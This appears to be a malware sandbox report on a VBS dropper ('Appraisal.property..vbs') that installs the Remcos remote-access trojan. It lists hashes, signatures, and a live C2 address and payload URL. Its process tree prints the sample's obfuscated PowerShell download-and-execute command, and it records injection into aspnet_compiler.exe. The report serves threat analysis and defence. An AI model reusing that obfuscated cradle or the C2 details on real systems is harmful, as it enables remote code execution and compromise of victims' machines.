Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-04-2021 10:30
Static task
static1
Behavioral task
behavioral1
Sample
Appraisal.property..vbs
Resource
win7v20210410
General
-
Target
Appraisal.property..vbs
-
Size
704B
-
MD5
7058bdc13d0094b435eaa07b09e76297
-
SHA1
f9084f4c4f1756fd531007a8fd7a344207a4cd13
-
SHA256
a465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200
-
SHA512
1b0bfd576cfae09c9d997ea8a93fa07e9b353cd68076d6665d21a6b46940126593d3eeb78331375a64a94e0b332581e1a4207e9217b5bf142c1798ddf7a12ed7
Malware Config
Extracted
https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT
Extracted
remcos
185.19.85.168:1723
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 10 1396 powershell.exe 19 1396 powershell.exe 21 1396 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1184 set thread context of 2628 1184 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1184 powershell.exe 1184 powershell.exe 1184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 2628 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3128 wrote to memory of 1396 3128 WScript.exe powershell.exe PID 3128 wrote to memory of 1396 3128 WScript.exe powershell.exe PID 1396 wrote to memory of 1184 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1184 1396 powershell.exe powershell.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe PID 1184 wrote to memory of 2628 1184 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.property..vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious use of SetWindowsHookEx
PID:2628
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8f6332bbb2ac7fd6aca48c0a7c389e99
SHA1f0158d25c9e29ef3769f4c5f6b23e08d836628b0
SHA256ad6b1343724f61fc76f17b844d53df5b5599b1b93c3709d7a2061c52ea46c9f2
SHA5125cc1a3c86976b0f4e88ca568f60f22241225b6a31a6f48f26a76bd84e9723541537c13f745745becca24f47f7a8e354dda948d30f521df5c842e56443fced8eb